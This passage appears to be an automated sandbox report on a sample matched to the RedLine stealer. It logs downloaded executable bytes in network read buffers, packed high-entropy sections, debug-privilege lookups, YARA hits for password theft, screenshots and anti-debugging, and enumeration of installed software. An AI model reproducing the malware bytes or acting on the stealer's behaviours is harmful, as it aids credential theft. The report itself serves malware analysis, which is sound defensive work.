InternetReadFile Jan. 26, 2024, 9:01 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd¦S}eð"hn°£@Ð£¡·f`ÐnµÀnX À£tn ) ¯£@¯£( °nàR@à.rsrcXÀnðR@À.idata ÐnôR@À @!ànöR@àxgrhcaku øR@àcnnrpfsb°£f@à.pdataIÀ£f@@ request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 26, 2024, 9:02 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL!¢®eàBa @ À`Ð`KÈLà' ` H.text$A B `.rsrcÈD@@.reloc J@BaH¸j <ø¦0j~:_~°( è s ~±(¢þþ ~²(¦~³(ª ?rps z.(7(0( 8'~´(®i]Ý&ÝX ?Îÿÿÿ 8$ XX ] X ?Ñÿÿÿ 8X ] X ] X ]%qaÒÝ1& 8 X X i?æÿÿÿÝXi?lÿÿÿ:´2æ1 0 8hP%q ®XÒP%q ¯YÒP%q èXÒZ~µ(²P%q aÒP%q@XÒP%qCYÒP%q ¸XÒP%q0aÒP%q ¢XÒP%qYÒP%q aÒP%q.XÒP%qXaÒP%qNXÒX ?þÿÿÝ&ÝA{{0] è>× ³[¼a~{{a~¶(¶s&;-s ~·(ºi< i=s&n~¸(¾~¹(Â( 0L~¸(¾~¹(Â( : þs ~º(Æ ~»(Ê9ðÿÿÿVCZX0 ¬%Ð~¼(Î i~½(Ò~~~¾(Öi@~¿(Ú& 0lã b þfa~{a~¶(¶ Rk J¢Ta~{Ra~¶(¶ ¶b a~{a~¶(¶ ~À(Þ~Á(â~ ~Â(æ9 Ý¡E 'îF§Y Ñ«¡a~{Ra~¶(¶ ^ÙÙ c ·×ªa~{Ka~¶(¶ \|et SøOa~{?a~¶(¶ sVÿ ·wO®a~{Ma~¶(¶ å©ö !$Àa~{}a~¶(¶ à@= c Ã3a~{ta~¶(¶ >[´ zB4öX s5îüa~{a~¶(¶ ~Ã(ê~Ä(î(+8W ~À(Þ~Ä(î(+ ~oo&X?¡ÿÿÿÝzA2~Å(ò{"}~¸(¾~¹(Â( ~Æ(ön~¸(¾~¹(Â( 0P~¸(¾~¹(Â%Ð~¼(Î B%Ð~¼(Î0~ X~Ç(ú ~È(þ8M ~ ~É( X~Ê(t* ~Ë( t~Ì(Xi?ªÿÿÿn~¸(¾~¹(Â( ö~¸(¾~¹(ÂÐ~Í(~Î(~Ï( 0W Ð( o @%Ð9( !s ,(s ) ~ 1~ %s &'j$/j+~ s 0.#"~ -( Ý&ÝEP0 W ÀiZ ]Y X ]: ij\nXjXm ijjZ 8Xi?èÿÿÿi%G `ÒR8$ njYÔ YZ?_d ÿj_ÒY=ÔÿÿÿiZ \ #Eg «Íï þÜº vT2 8 b89dXXbXXb`XXb`X`X=D¾ÿÿÿ (' (' (' ('(' (' (' (' (' (' (' (' (' (' (' ('(( (( (( (((( (( (( (( (( (( (( (( request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 26, 2024, 9:02 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELºú°¿à0âÌ @ @@K ÀÉ H.textà â `.rsrcÀÉ Êä@@.reloc®@BpHd:0vz°¸(0 As ~%:&~þs %(+o 8Îo %rprYp~ ( ¢%rqpr¯p~ ( ¢%rÇprp~ ( ¢%r!prap~ ( ¢(Å o 8,( ss~ }~ s ( o }{rqprÑp~ ( o 9rãprp~ ( 8Arprap~ ( o :{(È8{(Ç( þ 9 o ( o o ( {(Æ( þ 9×s s s þs ~%:&~þs %(+þ s ~%:&~þs %(+þs ~%:&~þs %(+o þ9b{%rip¢o r}p( (p(+o s (~(+oo #>@( ( io &Ý Ý( þ9þs ~%:&~þs %(+þs ~%:&~þs %(+þs ~ %:&~þs % (+(! &Ý Ýooþs" ~ %:&~þs# % (+ooþs$ ~%:&~þs% %(+oþs& ~%:&~þ s' %(+o(+9[s%o%r£p( o%s) o%o%s* o%s+ oo, (+9[s%o%rµp( o%s) o%o%s* o%s+ oo, Ý Ýoþ9o, (- :ÈúÿÿÝþo. Üo/ :'úÿÿÝ9o. ÜÝ&Ý8A /8 ³T èÙÁ ¸Bú7ã'.0Âs) %Ðá(0 s1 (2 (3 þ 9 Ý( s6%Ð«(0 s1 o9&8s¿o;o4 oºo;o4 o¼o;(o¾Ý ÝÝo¹( :o¹8rËpoºo»( :o»8rËpo¼o½( :o½8rËpo¾Üo½rËp(5 9o6 Xo5þ :ÜþÿÿÝ ÝÝ Ý8Ad}MÊ }[ØFY §® 0ës (2 (3 þ 9 Ý¿( s6%ÐÏ(0 s1 o9&8Ps %o;o4 o£%o;o4 o .þo¥%o;o4 o§%o;o 1þo©%o;o4 (7 @Bj[!¶Yo«%o;o4 o%o;(o¯oªjþ9-(8 (9 (: !µ÷õYo«Ý&Ý:8(®( þ 9 o; Xo5þ:þÿÿÝ&ÝÝ Ý8ALcr0ÉÐ× 0£s %ÐÕ(0 s1 (2 (3 þ 9 Ýb( s6%Ð(0 s1 o9&8ò%Ð¶(0 s1 o7o4 %Ð°(0 s1 o< :"%Ðç(0 s1 o< 8 9(s %Ðí(0 s1 o7o4 o o Ý&Ýþ9 o= Xo5þ:úþÿÿÝ ÝÝ Ý8*ALxÈ@E; 0Xs+ %ÐÕ(0 s1 (2 (3 þ 9Ý( request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 26, 2024, 9:02 a.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $h-,qê~,qê~,qê~2#~?qê~·~+qê~,që~\qê~2#n~qê~2#i~¢qê~2#{~-qê~Rich,qê~ü±ePELt¥Pà# /Í°@û;´P`4À± @°.text `.rdata´m°n@@.dataÀ0 @À.rsrc4` @@D$-÷ØjÀjàÀjPÿ°AÌÌÌÌÌÌÌÌÌÌÌÌÌÌÿ°AÀ~ %ÿÿ Pè¶ÿÿÿÌÌÌÌÌÌL$2ÀAºVI¶qÿ¶ÀÆ%ÿyH ÿÿÿ@¶1¶ÀÆ%ÿyH ÿÿÿ@¶q¶ÀÆ%ÿyH ÿÿÿ@¶q¶ÀÆ%ÿyH ÿÿÿ@Áêu^ÂÌÌÌÌÌÌÌÌÌì\|$L$ÀSUVW"2Ò3ÿÆD$ 3íD$ëI¸;ø+¶t$ ÿ¶¶ÒÞÓâÿyJÊÿÿÿBH;Ç}ÜGçÆD$yOÏàGí\|2f¶Ú"uf;u L$ÆD$îuè\|$uþD$ ëD$f¶òf0EýD$bÿÿÿ_^][ÄÂÌÌÌÌÌÌÌÌìSUV¾W3Û3ÿt$CãÿyKËÿÿÿC\$¶ t>%FÆG%yHÈà@¶ÃÇ½ÿ÷ý¸Bf9Q"uÌ\$3ÀQ"4æÿyNÎÿÿÿFÁæ f´"f2@Â=\|Ñt$Fþt$[ÿÿÿ_^][ÄÂÌÌÌÌÌÌÌÌÌÌÌÌÌSU¸·ÐVñWÂÁâ®"Â¹ýó«\|$WÎè þÿÿWÎèøþÿÿ3ÛþÕÿ3À ¶ÉÁÁáÈ@Â=1\|ßCÇû\|Î_^][ÂÌÌÌÌÌÌÌì8S°>D$+D$/°D$0D$1D$3UVñ¸þÿ+ÆD$¸ þÿ+ÆD$¸þÿ+ÆD$³2¸þÿ+Æ\$2\$AD$(W±>»þÿ¸þÿ+Þ+Æ¿þÿ²+þL$8L$BL$GÆD$4xÆD$5aT$:ÆD$>fÆD$A3ÆD$CÆD$DtT$FÆD$@øÆD$9bÇD$\$D$(\|$0ë\$ùÇ½÷ýÈ»¶l4÷û¶D4¯Å×âÿÁâÕ¶2Ç3Â%ÿyH ÿÿÿ@D$÷ûD$ÁÈ½¶\4÷ý¶T4¯ÓD:T$âÿÁâÓ¶23Â%ÿyH ÿÿÿ@AD$Ã÷ýD$ ÁÈãÿÁã¶T4T$$÷ýD$$Ø¶T4¯Ð¶3T:3ÐâÿyJÊÿÿÿBQT$( Ã÷ýãÿÁã¶D4T$,D$$ È÷ýD$$Ø¶T4¯Ð¶3T:3ÐâÿyJÊÿÿÿB\|$0D$QÁú þÿÿPÎèûÿÿjÎ è9ýÿÿ_^]°[Ä8ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUl$ýWùÚD$Vt$UPVè^Äýu ¶¶ ÁÁáÏ ^_]ÂMÿ3ÀÉ~-Së ¤$I¶0¶\0ÂÁâ×0@;Á\|á[¶ ¶T.ÿðUÂÇÁâD.ÿÁø\|(ë¶0¶L0ÿÂÁâÏ 0Hø}à¶¶ ÂÁâ×^_]Âì$VD$,¶¶Pñ£òTL$¶HT$¶PöÑòuL$¶HT$¶PñçòDL$¶HT$ ¶PñKò#L$ ¶HT$¶P ñ¿òEL$¶H T$ ¶Pñ;òVL$¶HT$¶P ñøòL$¶HT$¶Pñ[òôL$¶HT$¶PñµòL$¶HT$¶Pñ{òL$¶HT$¶PñôòvL$¶HT$¶Pñ¹ò4L$¶HT$¶Pñ¿òL$¶HT$¶Pt$0ñçòxL$¶HT$¶PñòéL$ ¶HT$!¶Pj D$Pñoò´VL$.T$/ÆD$0èÄÆ^Ä$ÃÌÌÌÌÌÌÌÌÌÌVt$öu hWè øÿÿL$É} hWèû÷ÿÿW\|$ÿu hWèè÷ÿÿ;Çt:;L$~jQPèVÄÀu5hèÂ÷ÿÿPèqÄ>>uhè¨÷ÿÿ;L$~éjQèÝÄëÜ_^ÃSVWjÙèêðÄöt-\|$WÇFÇFÿt±AÀuÿthèÞ3ö3öu hèÌ_^Ã[ÂÌÌÌÌVñÀtQPÿÒÆÇ^ÃÌÌÌÌÌSUl$Ùíu+][ÂVWUÿ°AøhCPGWSèÁþÿÿL$(ÄWPWUjQÿ°Að÷ÞöÆtVÿ°AøzuBT$jjWUjRÿ°AðhCPVSèpþÿÿL$(ÄVPWUjQÿ°Að÷ÞöFötèöÿÿ_^][ÂÌÌÌVWù7öt>FPÿ°AÀuöt&ÀtPÿp±AFÀt PèõÄVèáÄÇ_^ÃÌÌÌÌÌìSUVW3ÛSÿ\|±A$PL$QÆD$àÆD$;ÆD$ÆD$ÆD$¢ÆD$ÆD$ÆD$AÆD$ ÓÆD$! ÆD$"dÆD$#ÆD$$ÆD$%÷ÆD$&=ÆD$'ÆD$(ÙÆD$)îÆD$*ÆD$+hÆD$,ôÆD$-vÆD$.¹ÆD$/4ÆD$0¿ÆD$1ÆD$2çÆD$3xÆD$4ÆD$5éÆD$6oÆD$7´\$8èûÿÿPèßÄ= ²A½ ÿD°APjè$xøRWÇ$$ÆD$dÎÆD$e'ÆD$fÆD$gÆD$hÆD$i.ÆD$j"ÆD$kWÆD$lÆD$m!ÆD$nWÆD$o:ÆD$pøÆD$qÆD$r[ÆD$sôÆD$tµÆD$uÆD$v{ÆD$wÆD$xôÆD$yvÆD$z¹ÆD${4ÆD$\|¿ÆD$}ÆD$~çÆD$xÆ$Æ$éÆ$oÆ$´$ÆD$ÀÆD$8ÆD$ÆD$ÆD$ÆD$0ÆD$eÆD$GÆD$ ÓÆD$!)ÆD$";ÆD$#VÆD$$øÆD$%ÆD$&[ÆD$'ôÆD$(µÆD$)ÆD request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 26, 2024, 9:02 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELî\©eàöN @ ``K ¸à'@À H.textTõ ö `.rsrc¸ ø@@.reloc@þ@B0H&´4>è0V~:K( è s ( þþ ( ( ?rps z(0÷ 8( i]X ?Þÿÿÿ 8$ XX ] X ?Ñÿÿÿ 8iX ] X ] Ý&rêp( Ý X ]%qaÒXi?ÿÿÿ¤ ®0· 8P%q ®XÒÝ&P%qYÒÝP%q ¯YÒP%q èXÒP%q aÒP%q@XÒP%qCYÒP%q ¸XÒP%q0aÒP%q ¢XÒP%qYÒP%q aÒP%q.XÒÝ&P%qYÒÝP%qXaÒP%qNXÒX ?\þÿÿÝ&ÝAL&BV°°0)s o i< i=s &2(( 03(( : þs ( o 9õÿÿÿVCZX0 ¬%Ð( ÿÿÿ(i( ~~( i@(& ~((&Ýz(2(( Þ(%Ð( ²%Ð( 0c~ Xo o 89 ~ o Xo t) (! to" Xi?¾ÿÿÿ2(( ~(Ð (# o$ o% 2(( 0H~:=( ès ( ( ( ?rps z( *BSJBv4.0.30319l#~lô #Strings`#USh#GUIDx<#BlobWÕ4 2%' "CHOHV"o¢"¹"Ö"õ"BbHh""H¦BÄ"áõGRHãHH»HÄHíH÷HH9HHÓHâHúHH#(?HnBHH "$H)"3"T""H½HÜ" HHf B#,?MY?M l?MMÄQíQ Q+MZ?MmU?M¥M íQêQQ$QAQ^Q{QÉ°ºÄØ£ì§«IÉ3^33à!3! %3b )3£ 3ä -3% 1P ªÌ´ Ì ó /û K n ¬¼ É'Ð!ðFà# R$=©($=©h$Z$d©$%¦©,%=©<%Ìt%°ä%=©ô%Ì=nÆø!Æ"Æ8%$&SÌ&x&=©&ÿÿ(1B =¹!=¹)=¹1=¹9=¹A=¹I=¹Q=oa=¹i=¹y=©=¹=Ã¹ÍÕ¹=Ú¹Õá±äêÁòîÉ=¹éÛ<ñêA=©_=©=n Ft J}}1>Æ9JÍQ_ê1qÔaÛA¢ç9«í9Ïöqåü=©=©'35.S6.Kt.Cf.kº.c.[.Ê.¾.¡.#.;<.36.+!£;5£;5;5¬² (@Ð/NX request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 26, 2024, 9:02 a.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $ËS½^ª=î^ª=î^ª=î1Ü£îGª=î1Üî*ª=î1Üîzª=îWÒ®î[ª=î^ª<î=ª=î1Üî_ª=î1Ü§î_ª=î1Ü î_ª=îRich^ª=îPELy°cà FF,`@à"u\|¢<@¨_ `.textjDF `.rdata¾K`LJ@@.dataÀs°"@À.tlsÍ 0 ¸@À.rsrc¨@`Â@@ÝD$ÝD$ÙóÃÌÌÌÌÌÝD$éÙ¶ÌÌÌÌÌÌÌÙD$ìÝ$èqµÄÃÌÌÌÌÌÌÌÌÌÌÌÌÌQ$PÎÇD$èOÇxbCÆYÃÌÌÇxbCéÐÌÌÌÌÌVñÇxbCè½öD$t Vè&ÄÆ^ÂÌÌÌÌÌÌÌÌÌÌÌÌP@Éuù+ÂÃÌÌÌPQRèhùÄÃÌÌÌÌPQRèHÄÃÌÌÌÌ ÃÌÌÌÌÌÌÌÌÌÌÌVñÈWÇFÇFÆyAÒuù+Ïùèð_Æ^ÃÌÌÌÌÌÌÌÌÌÌÌS3ÛÇF^;÷tL~rPèpÄÇF^sOAQWVè®ÄëGFON__Æ[ÃÌÌÌÌÌÌÌÌÌÌÌÌÌ@ÃÌÌÌÌÌÌÌÌÌÌÌÌ3ÉHHÃÌÌÌÌÌOVð;ñsG;ÆwA+ð¸$I÷îÖÁúòÁîò;OuÏèOõ+ÆORè ÄG^Ã;OuÏè#OVèúGÄ^ÃÌ;÷t]~rPèÄÇFÇFÆsOAQWVè¸Äë ÇGFONÇGÇGÆÃÌÌÌÌÌÌÌÌÌÌÌÌVÈWqAÒuù+Ît$ùèU_^Â\|$t"~rSÿtWSVèT÷ÄSèÜÄ[ÇF~Æ7ÂÌÌÌÌÌÌxrÃÌÌÌÌÌÌÌÂÌÌÌÌÌÌÌÌÌÌÌÌÌ;As 9w¸Ã3ÀÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌSVq+ó¸$I÷îÖÁúòÁîòþH$ v hxCèrWy+û¸$I÷ï×ÁúÂÁèFÂ;ðv!ÐÑê¿I$ +ú;øs3ÀëÂ;ÆsÆPèc_^[ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌV3öt!W{;÷t èË Æ;÷uôPèÝÄ_ÇÇCÇC^ÃÌÌ3ÉHHÂÌÌÌSØÛtKNùrëÆ;Ør9ùrëÆVÐ;Óv%ùr+ØVÇÎè [ÃÆ+ØVÇÎè[Ãÿþv hCèoF;ÇsFPWVèÍÿtL~r ëÿuò~ør ÆÆ[ÃÆÆ[ÃÆWSPèyõÄ~~r Æ8Æ[ÃÆÆ8Æ[ÃÌÌÌÌÌÌÌÌÌxHrÆÃh`Cè3ÌÌÌÌÌÌPè»YÃÌÌÌÌÌÌÌÌUìjÿhàSCd¡PìSVW¡L±C3ÅPEôd£eðùMùI$ v hxCè w+7¸$I÷îÖÁúÂÁèÂ;ÁèéÇEüuOVPEèè0O7Mì+Î¸$I÷éÑÁúÚÁëÄÚöt$;uìt¤$èÛÆ;uìuóQèìÄEÅ+ÐEèÝ+ÓOOMôd Y_^[å]ÂUèRè¦ÄjjèÌÌÌÌÌÌÌÌÌH+¸$I÷éÑÁúÂÁèÂÃÌÌÌÌÌÌÌH+¸$I÷éÑÁúÂÁèÂÃÌÌÌÌÌÌÌVð;÷tè$Æ;÷uô^ÃÌÌÌÌÌÌÌÌÌÌÌH+¸$I÷éÑÁúÂÁèÂÈÑéºI$ +Ñ;Ðs3ÀëÁ;ÆsÆÃÌÌÌÌÌÌÌÌÌÌÌÌhxCè ÌÌÌÌÌÌSPÈÿ3Ûè[ÃÌÌUl$VW}ñ;ûs h`Cè# +û;Çsø;õuÈÿè¯Ã3Éè¦_Æ^]Âÿþv hCèF;ÇsFPWVèýÿtj¸9Er)Më&ÿuí~ør _ÆÆ^]Â_Æ^Æ]ÂÍ9FrëÆWËQPèòÄ~~rÆ8_Æ^]ÂÆÆ8_Æ^]ÂÌÌÌÌÌÌÌþþv hCèH;ÎsHQVPè_3Ò;ÖÀ÷ØÃöu pùrÆ3Ò;ÖÀ÷ØÃÌÌÌÌÌÌÌÌÌÌÌÌöt)PúrëÈ;ñrúrëÈ@Á;Æv°Ã2ÀÃhCèÌÌÌÌÌÌì3ÀÉtNùI$ wÍ+ÁÀÀPèJÄÀu,$QL$ÇD$èhðCT$RÇD$xbCè~ÄÃÌÌÌÌÌ¸I$ ÃÌÌÌÌÌÌÌÌÌÌWøF;Ás h`CèI+Á;ÇsøÿtLVSúrëÞúrëÖ+ÇÙPßÑSRèFÄ+Ç~F[r ÆÆ_ÃÎÆÆ_Ã¸þÿÿÿÃÌÌÌÌÌÌÌÌÌÌUìjÿhSCd¡PìSVW¡L±C3ÅPEôd£eðE}ðÎþþvðë'_¸«ªªª÷æËÑéÑê;Êv¸þÿÿÿ+Á4;Øv¾þÿÿÿ3ÀNEü;ÈvùÿwQèÄÀtEëLMìQMÜÇEìèÇ hðCUÜRÇEÜxbCè4EHeðEèÆEüèªE¸@Ã}uè]ÛtrëÇSPEPèíïÄrQèmÄEÆw_þrøÆMôd Y_^[å]Âu~rRè,ÄjÇFÇFjÆèÌÌÌÌÌÌÌÌÌÌÌÌÌÌì3ÀÉt>ùÿw QèúÄÀu,$PL$ÇD$èÃhðCL$QÇD$xbCè.ÄÃÌÌÌÌÌÈÿÃÌÌÌÌÌÌÌÌÌÌÌÌjÿh¥SCd¡PS¡L±C3ÄPD$d£3ÀD$;ÈtAÇAD$PÈÿ3ÛèûÿÿL$d Y[ÄÃÌÌÌÌÌÌÌÌÌ2ÀÃÌÌÌÌÌÌÌÌÌÌÌÌÌD$PQL$è!ÄÂÌÌÌÌÌÌÌÌÌÌÌD$VPñè¶ÇxbCÆ^ÂÌÌÌÌÌÌÌjÿh¥SCd¡PS¡L±C3ÄPD$d£3ÀD$;ÈtAÇAD$PÈÿ3 request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (5 events)

section

{u'size_of_data': u'0x00072a00', u'virtual_address': u'0x00001000', u'entropy': 7.999602895794089, u'name': u'', u'virtual_size': u'0x0010a000'}

entropy

7.99960289579

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x00011e00', u'virtual_address': u'0x0010b000', u'entropy': 7.995181471687354, u'name': u'', u'virtual_size': u'0x00027000'}

entropy

7.99518147169

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x00000800', u'virtual_address': u'0x00132000', u'entropy': 7.2921022948448, u'name': u'', u'virtual_size': u'0x00004000'}

entropy

7.29210229484

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x0009d800', u'virtual_address': u'0x00445000', u'entropy': 7.93891085890907, u'name': u'.data', u'virtual_size': u'0x0009e000'}

entropy

7.93891085891

description

A section with a high entropy has been found

entropy

0.986417657046

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (7 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Jan. 26, 2024, 9:01 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Jan. 26, 2024, 9:01 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Jan. 26, 2024, 9:01 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Jan. 26, 2024, 9:01 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Jan. 26, 2024, 9:02 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Jan. 26, 2024, 9:02 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Jan. 26, 2024, 9:02 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (19 events)

description	Take ScreenShot	rule	ScreenShot
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	RedLine stealer	rule	RedLine_Stealer_m_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (50 out of 153 events)

Time & API	Arguments	Status
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000484 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExA Jan. 26, 2024, 9:01 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x00000470 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
